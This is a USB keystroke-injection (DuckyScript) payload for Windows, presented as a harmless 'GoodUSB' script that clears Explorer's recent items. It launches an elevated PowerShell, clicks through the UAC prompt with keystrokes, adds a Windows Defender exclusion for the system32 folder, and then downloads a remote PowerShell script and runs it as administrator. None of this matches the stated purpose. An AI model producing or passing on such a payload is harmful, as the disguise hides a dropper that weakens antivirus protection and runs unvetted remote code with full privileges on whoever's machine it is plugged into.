REM Title: Clear_Explorer
REM Author: galli3r
REM Description: Clear last used items in the explorer app.
REM Target: Windows
REM Version: 1.0
REM Category: GoodUSB
REM ==================================================
REM = Start Program                                  =
REM ==================================================
DELAY 1000
GUI r
DELAY 750
STRING powershell Start-Process powershell -Verb runAs
CTRL-SHIFT ENTER
DELAY 1500
SHIFT TAB
DELAY 500
ENTER
DELAY 1500
STRING Add-MpPreference -ExclusionPath C:\Windows\system32
ENTER
DELAY 500
STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/galli3r/files/blob/main/clear_last_used_items.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
ENTER
